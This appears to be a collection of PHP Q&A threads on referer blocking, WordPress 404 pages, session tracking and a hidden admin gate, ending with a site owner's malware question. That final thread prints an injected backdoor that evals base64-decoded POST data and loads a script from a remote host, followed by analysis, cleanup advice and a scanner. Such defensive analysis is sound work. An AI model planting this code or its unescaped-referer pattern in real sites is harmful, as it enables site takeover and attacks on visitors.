I'm the owner of a web site with a dozen web pages, made using PHP. Some time ago I discovered that some guys, using the Joomla CMS and its wrapper menu option, included my starting (login) page there and in this way confused members and other visitors, especially because the wrapper "window" isn't big enough and some information on my page isn't visible. In this way visitors associate these pages with me and get a bad feeling about my whole site. I contacted these guys but got no answer, then I tried to solve it by using the $_SERVER['HTTP_REFERER'] super variable but I didn't get a right and working solution for this problem. Has someone experienced a similar problem? Thanks.
EDIT - This is the code
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
if ($HTTP_REFERRER) {
// check if the referrer is on your noentry list
// if so redirect it to another page
if ($HTTP_REFERRER == "www.mean.visitor.com") {
echo 'referer is' . $HTTP_REFERRER;
die;
}
// shows the referrer and formats ur local harddrive
echo "You came from $HTTP_REFERRER";
} else {
//everything is OK
}
From the code you posted, the first problem I see is on the first line:
$HTTP_REFERRER=%SERVER['HTTP_REFERER'];
should be
$HTTP_REFERRER=$_SERVER['HTTP_REFERER'];
Then in the second if you must insert the web address you want to block, so change
if ($HTTP_REFERRER == "www.mean.visitor.com")
with
if ($HTTP_REFERRER == "the address you want to block")
And write die() instead of die.
Has something changed?
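A referer check done the way the answer describes, as an added example (not the original poster's or answerer's code): the blocked host name, the redirect target and PHP 8 (for str_ends_with) are assumptions. It also sends the framing headers that stop a browser from rendering the site inside a wrapper at all, which works even when no Referer is sent.

```php
<?php
// Added example: block requests whose Referer host is on a deny list, and
// tell browsers not to render this site inside a frame.
// "www.mean.visitor.com" and the redirect target are placeholders.

$blockedHosts = ['www.mean.visitor.com'];   // placeholder deny list

function refererHost(): ?string
{
    // Referer is optional and fully under the client's control: a hint only.
    $ref = $_SERVER['HTTP_REFERER'] ?? '';
    if ($ref === '') {
        return null;
    }
    $host = parse_url($ref, PHP_URL_HOST);
    return is_string($host) ? strtolower($host) : null;
}

function isBlockedReferer(array $blockedHosts): bool
{
    $host = refererHost();
    if ($host === null) {
        return false;
    }
    foreach ($blockedHosts as $blocked) {
        // exact match, or a subdomain of a blocked host
        if ($host === $blocked || str_ends_with($host, '.' . $blocked)) {
            return true;
        }
    }
    return false;
}

// Refuse to be embedded in any frame (send before any output).
header('X-Frame-Options: DENY');
header("Content-Security-Policy: frame-ancestors 'none'");

if (isBlockedReferer($blockedHosts)) {
    // Send the visitor to the real front page instead of serving content.
    header('Location: https://www.example.com/', true, 302);
    exit;
}
// ... normal page output follows
```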
I am really a noob when it comes to PHP and I would like to ask for your help. I would like to create a 404.php for my Wordpress site that shows the 404 page in the appropriate language. The site is multilingual: Dutch and English. (I tried some plugins but they don't work with my current theme). I have done some research and found some bits and pieces and mastered a piece of php code that doesn't work. If you could be so kind to point me in the right direction, that would be great. This is what I came up with:
<?php
$incomingUrl = $_SERVER['REQUEST_URI'];
if($incomingUrl == 'damcms.com/en') {
wp_redirect(damcms.com/en/page-not-found-404);
exit;
} else {
wp_redirect(damcms.com/pagina-niet-gevonden-404);
exit;
}
?>
I don't get an error message, nothing is being shown. So I miss something, what? Thanks in advance.
Claudia
First, the reason nothing happens is here:
wp_redirect(damcms.com/en/page-not-found-404);
Any time you have a string in PHP it must be in quotes; otherwise PHP tries to interpret it as instructions (and damcms.com/en/page-not-found-404 is not a valid PHP instruction).
So this would work:
wp_redirect('damcms.com/en/page-not-found-404');
But there's a bigger issue: you don't want to just check if the URL is exactly damcms.com/en — you want to check if it starts with damcms.com/en.
So, perhaps this:
if(strpos($_SERVER['REQUEST_URI'], 'damcms.com/en') !== false) {
wp_redirect('damcms.com/en/page-not-found-404');
} else {
wp_redirect('damcms.com/pagina-niet-gevonden-404');
}
exit;
But going one level deeper, even this is a little iffy. WordPress already has a 404.php template that shows for any 404 page. I strongly recommend editing that — and there do the if ... 'damcms.com/en' test and then perhaps just include a 404-en.php template. That way the existing 404 mechanism still works. With the setup you have, the visitor is being redirected to a 200 page, so to a search engine it will appear your site has no 404s at all and everything is valid content!
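A theme 404.php along the lines the answer recommends, as an added example (not the answerer's code): it assumes the English pages live under /en/ and that the theme contains a 404-en.php template, and it keeps the normal 404 response instead of redirecting.

```php
<?php
// Added example: WordPress theme 404.php that keeps the 404 status and only
// switches the template by language. Dutch is the default here (assumption).

$requestPath = $_SERVER['REQUEST_URI'] ?? '/';

// REQUEST_URI holds only the path (and query string), never the host name,
// so the test is for the "/en/" prefix rather than for "damcms.com/en".
$isEnglish = strpos($requestPath, '/en/') === 0 || $requestPath === '/en';

if ($isEnglish) {
    // get_template_part('404', 'en') loads 404-en.php from the theme
    get_template_part('404', 'en');
} else {
    get_header();
    ?>
    <h1>Pagina niet gevonden</h1>
    <p>De pagina die u zoekt bestaat niet (meer).</p>
    <?php
    get_footer();
}
```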
I do not care about people viewing my source code, however, I want Bots to avoid coming on to my site and getting through my security. I was hoping to disable page source viewing. To do this, I am using this code:
$url= $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$needle = "view-source:";
if (strpos($url,$needle)) { echo "You can not see me";}
else {
//The rest of my index page
}
The objective here is that if someone tries to view my page source or if a bot tries to, then rather than being able to see it, the code will detect that the page URL is view-source:www.yoururl.com and will display a "Nice try" message in the source instead of the page source. The code above in theory should have worked, but didn't. Any other ideas to try and make this work?
This cannot be done, the HTML source code is passed to whoever requests it. You should probably redesign your captcha, as it is not secure from how you described it. Use session variables to store the data and to check against the submitted value on the form processor script.
You could use mod_rewrite and a permanent 301 redirect in your .htaccess to hide the ?captcha=xxxx part of your URL, if that is your sole concern.
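The session-based captcha check the first answer recommends, as an added example (not the answerers' code): the expected answer never appears in the URL or the HTML, so hiding the page source is not needed. Function and field names are assumptions.

```php
<?php
// Added example: keep the expected captcha answer server-side in the session
// and compare it against the submitted value in the form processor.
session_start();

function captchaIssue(): string
{
    // Random 6-character challenge; only the server knows the answer.
    $answer = substr(bin2hex(random_bytes(4)), 0, 6);
    $_SESSION['captcha_answer'] = $answer;
    $_SESSION['captcha_issued'] = time();
    return $answer;   // render this as an image, never as text in the HTML
}

function captchaVerify(string $submitted): bool
{
    $expected = $_SESSION['captcha_answer'] ?? null;
    $issued   = $_SESSION['captcha_issued'] ?? 0;
    // One-time use: drop the answer whether or not this attempt succeeds.
    unset($_SESSION['captcha_answer'], $_SESSION['captcha_issued']);
    if ($expected === null || time() - $issued > 300) {
        return false;   // no challenge outstanding, or older than 5 minutes
    }
    // Constant-time, case-insensitive comparison.
    return hash_equals(strtolower($expected), strtolower(trim($submitted)));
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (captchaVerify($_POST['captcha'] ?? '')) {
        echo 'Thanks, form accepted.';
    } else {
        echo 'Captcha failed, please try again.';
    }
} else {
    $challenge = captchaIssue();
    // In practice $challenge is drawn into an image served by another script;
    // the form itself carries nothing that reveals it.
    echo '<form method="post"><input name="captcha"><button>Send</button></form>';
}
```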
I'm trying to get three things into a hidden form field in a Wordpress page:
The last "offsite" page visited before someone visited any page on my site (e.g., quite possibly a Google page)
The first page they visited on my site
The last page on my site before they went to the form page
The third one is easy (just use ), but the first two are giving me problems.
I'm trying to save #1 and #2 by using session variables, so that on every page, in the header, I have the following code:
<?php
session_start();
if (! isset($_SESSION['offsite_referer'])) {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'];
}
if (! isset($_SESSION['first_page'])) {
$_SESSION['first_page'] = $_SERVER['REQUEST_URI'];
}
?>
Then further down I have, as test code (to be changed to input type=hidden etc. later):
<p>offsite_referer: <?= $_SESSION['offsite_referer'] ?></p>
<p>first_page: <?= $_SESSION['first_page'] ?></p>
(FWIW, I also have session_start() at the top of my wp-config.php. Yes, my site has register_globals turned off.)
For some reason, $_SESSION['offsite_referer'] always ends up as my home page, even when I hit the form page (/free-reports) directly via link from another site. Similarly, first_page always shows up as /
Yes, I'm clearing all my cookies etc. between attempts, to force a new session to be created.
This code used to work fine on my pre-Wordpress site, so I can only think it has something to do with WP, specifically perhaps WP's redirection (WP's mod_rewrite stuff in .htaccess)
I tried changing $_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'] to wp_get_original_referer() but it seemed to have no effect.
Incidentally, if I access my form page (at /free-reports/) as the first page on my site (after clearing cookies etc.) and printing $_SERVER['HTTP_REFERER'], it correctly shows the last offsite page - even though $_SESSION['offsite_referer'] doesn't.
I'm pretty perplexed, and have spent a fair amount of time trying to figure it out on my own, so any help to solve this would be appreciated.
Chances are, you can't really get the referer URL since some browsers don't send that and some people disable that, but here's how you could do that and I'll give you some extra tips here:
//first of all, initialize the session
session_start();
//Now call logvisit() to log where the user is coming from
logvisit();
function logvisit() {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'] ?? ''; // the header may be absent
$browser = $_SERVER['HTTP_USER_AGENT'] ?? ''; //Gets the browser the user is using
//If you want to test it (disable the code below if you don't want to print that information):
echo "Offsite referer: {$_SESSION['offsite_referer']}<br>"; // braces are required for a quoted key inside a string
echo "Browser: $browser<br>";
}
Then to destroy the session you can use unset($_SESSION['offsite_referer']);
This is how I usually do it, and it's often a tidy way to do it.
I believe scunliffe had the key to this, as I was using IE to do the testing.
It works fine now, which I attribute to actually closing and restarting IE (apparently just deleting cookies doesn't do it, as you'd think, even though that works fine in Firefox).
I also changed what I was doing slightly to just save the full in-site browse history in a session variable, rather than only first and last page on the site.
The code I ended up with was the following, which is just at the top of my theme's header.php file:
<?php
session_start();
if (! isset($_SESSION['site_history'])) {
$_SESSION['offsite_referer'] = $_SERVER['HTTP_REFERER'];
$_SESSION['site_history'] = '';
}
$_SESSION['site_history'] .= ($_SERVER['REQUEST_URI'] . ';');
?>
I originally had session_start() also in wp-config.php when I was trying to figure this out, but was able to remove it (leaving just the above code in header.php) and things still work fine.
In case anyone finds this page wanting to do something similar, I was able to access this info in my WP page by adding the following to my theme's functions.php:
function get_offsite_referer() { return $_SESSION['offsite_referer']; }
add_shortcode('offsite-referer', 'get_offsite_referer');
function get_site_history() { return $_SESSION['site_history']; }
add_shortcode('site-history', 'get_site_history');
and then to pass the info on my Wordpress page/form:
<input type="hidden" name="offsite_referer" value="[offsite-referer]" />
<input type="hidden" name="site_history" value="[site-history]" />
scunliffe, if you'd posted your comment as a "reply" I would have "accepted" it, since it was what most closely led me in the right direction, but as a comment I could only upvote it so that's what I did. Thanks!
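The shortcodes above copy the Referer header, which any visitor can set to arbitrary text, straight into value="..." of a hidden input. An added example (not the poster's code) of the same functions.php additions with the output escaped and validated; function names, the length limits and the URL-only rule are assumptions.

```php
<?php
// Added example: hardened versions of the two shortcodes. The Referer value
// is validated as an http(s) URL and escaped before it lands in an attribute.

function tracking_session_init() {
    if (session_status() === PHP_SESSION_NONE) {   // header.php may already have started it
        session_start();
    }
}
add_action('init', 'tracking_session_init');

function get_offsite_referer_safe() {
    $value = $_SESSION['offsite_referer'] ?? '';
    // Keep only something that parses as an http(s) URL; otherwise drop it.
    if (!filter_var($value, FILTER_VALIDATE_URL)
        || !preg_match('#^https?://#i', $value)) {
        $value = '';
    }
    return esc_attr(substr($value, 0, 2000));   // safe inside value="..."
}
add_shortcode('offsite-referer', 'get_offsite_referer_safe');

function get_site_history_safe() {
    $value = $_SESSION['site_history'] ?? '';
    return esc_attr(substr($value, 0, 4000));   // cap growth of the session value
}
add_shortcode('site-history', 'get_site_history_safe');

// Receiving side (the form handler): the hidden fields come back from the
// browser, so treat them as untrusted input again.
function read_tracking_fields(array $post): array {
    return [
        'offsite_referer' => sanitize_text_field($post['offsite_referer'] ?? ''),
        'site_history'    => sanitize_text_field($post['site_history'] ?? ''),
    ];
}
```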
I am trying to hide my website's CMS application...
So I thought I would add a bit of PHP to any random page on my site that includes a GET reference to some random string... So basically, if you go to page x and add ?RANDOMSTRING the CMS index is included. This is stored above the web root... Here is the piece of PHP:
$docRoot = $_SERVER['DOCUMENT_ROOT']; // was not defined in the original snippet
if (isset($_GET['J7sd-H3sc9-As3R']))
{
require_once($docRoot . '/../../includes/admin/index.php');
}
Basically, index.php is laid out as a page with 3 fieldsets. In the 3 fieldsets are various links relating to various applications that deal with various tasks. They were accessed through the same means as the above code, and they were held in the web root and were able to be accessed via HTTP...
That all worked perfectly fine, but the problem now comes when I try to access any specific part of the CMS... so what would have been:
http://www.mysite.com/admin/part/
is now:
include($_SERVER['DOCUMENT_ROOT'] . '/../../includes/admin/part/index.php');
Or something of the sort...
So now when i go to my page at
http://www.mysite.com/randomDirectory/
and add:
http://www.mysite.com/randomDirectory/?J7sd-H3sc9-As3R
I get sent to my CMS... Cool... But when I try to click on any section I get this header:
http://www.mysite.com/randomDirectory/?part
and the page gets refreshed to:
http://www.mysite.com/randomDirectory/
If that makes sense...
Could anyone provide me with any input or suggestions regarding the task that I am trying to accomplish? I am not sure if it is even possible to start off with, but it seems simple enough.
Any replies would be greatly appreciated, Thanks!
I guess you should append at the end of every link in your page something like
<?php if (isset($_GET['J7sd-H3sc9-As3R'])) echo '?J7sd-H3sc9-As3R'; ?>
Example:
http://www.mysite.com/randomDirectory/randomPage<?php if (isset($_GET['J7sd-H3sc9-As3R'])) echo '?J7sd-H3sc9-As3R'; ?>
edit
An easier way to do this would be to use sessions, in this way:
<?php
session_start();
if (isset($_GET['J7sd-H3sc9-As3R']))
{
$_SESSION['token'] = 'J7sd-H3sc9-As3R';
}
if (!isset($_SESSION['token']) || $_SESSION['token'] !== 'J7sd-H3sc9-As3R')
{
exit;
}
// go on with your page
?>
In this way, when you open a page with your token in the url, the session is started and the token is saved in the session, so it should work without the need to insert the token in every url until you close your browser.
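The session approach from the answer with the details a practitioner would add, as an added example (not the answerer's code): constant-time comparison of the token, a fresh session id once the gate opens, an expiry, and a plain 404 for everyone else. The token value, lifetime and include path are placeholders.

```php
<?php
// Added example: the unlock token is presented once in the URL, then the
// unlocked state lives in the session, so admin links need no token.
session_start();

const ADMIN_UNLOCK_TOKEN = 'J7sd-H3sc9-As3R';   // placeholder; load from config outside the web root
const ADMIN_UNLOCK_TTL   = 3600;                // seconds a session stays unlocked

function adminUnlock(): void
{
    // Was the token supplied as a query-string key on this request?
    foreach (array_keys($_GET) as $key) {
        if (hash_equals(ADMIN_UNLOCK_TOKEN, (string) $key)) {
            session_regenerate_id(true);        // new id once the session becomes privileged
            $_SESSION['admin_unlocked_at'] = time();
            return;
        }
    }
}

function adminIsUnlocked(): bool
{
    $at = $_SESSION['admin_unlocked_at'] ?? null;
    if ($at === null || time() - $at > ADMIN_UNLOCK_TTL) {
        unset($_SESSION['admin_unlocked_at']);
        return false;
    }
    return true;
}

adminUnlock();
if (!adminIsUnlocked()) {
    http_response_code(404);   // indistinguishable from any other missing page
    exit;
}
// Links inside the CMS can now be ordinary relative URLs.
require_once $_SERVER['DOCUMENT_ROOT'] . '/../../includes/admin/index.php';
```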
Can someone please advise what this PHP code will do? I have found this code in every .php page only. Other pages like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.
Here is the Code:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
I haven't examined it closely, but only the line
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
shows me already that it is, if not malicious, then very very close - there is code injection possible.
It's more likely it will redirect your every page to attacker website.
The # will halt any errors so you won't get any logs from this script.
You should remove it if you want your site to work properly.
EDIT: it doesn't redirect but it will inject anything it wants on your pages.
The second part of the script where it checks for cookies will add a javascript from his website and can do malicious things.
The last part I don't think anyone will be able to guess what is it because it relies on some post variable and that's $_POST['showimg'], I guess he attacked your website with POST.
Things to do: Change your passwords, check for write permissions on your files, they shouldn't be 0777, backup database and WordPress Template, delete WordPress install and re-install from scratch. In your template search for his code then add your cleaned template.
Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.
You mentioned that you're using wordpress, please read this article about hardening wordpress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.
I'm a security analyst and I believe it is redirecting you to a possibly malicious website if and only if you do not have that cookie. If you already have that cookie then the script will know you have already been there and are possibly researching the malware, thus not executing the redirect. The image may be like a detect-debugger preset API... this is just my opinion.
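The answers say to search the template for the injected code; an added example (not from anyone on this page) of a small scanner that does that systematically over a directory tree. Its signatures are taken from the sample quoted above (the eval of a decoded POST value, the sessdt_ variable prefix, the silenced setcookie and the vekra.ee host); the scan path is an assumption.

```php
<?php
// Added example: flag .php files that contain fragments of the injected code
// shown on this page, so the clean-up can be checked file by file.

const SUSPICIOUS_PATTERNS = [
    'eval of decoded POST'    => '/eval\s*\(\s*base64_decode\s*\(/i',
    'sessdt_ variable prefix' => '/\$sessdt_[a-z]\b/',
    'silenced setcookie'      => '/[@#]setcookie\s*\(/',
    'known remote host'       => '/vekra\.ee/i',
    'injected script tag'     => '/<script src=\'\$sessdt_u\'>/',
];

function scanFile(string $path): array
{
    $hits = [];
    $src = file_get_contents($path);
    if ($src === false) {
        return $hits;
    }
    foreach (SUSPICIOUS_PATTERNS as $label => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

function scanTree(string $root): array
{
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $hits = scanFile($file->getPathname());
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

// usage: php scan.php /var/www/html   (the path is an assumption)
foreach (scanTree($argv[1] ?? '.') as $path => $hits) {
    echo $path, ': ', implode(', ', $hits), PHP_EOL;
}
```

Files the scanner lists still need a manual look; a match on the eval pattern alone is a strong indicator, the other labels are supporting evidence.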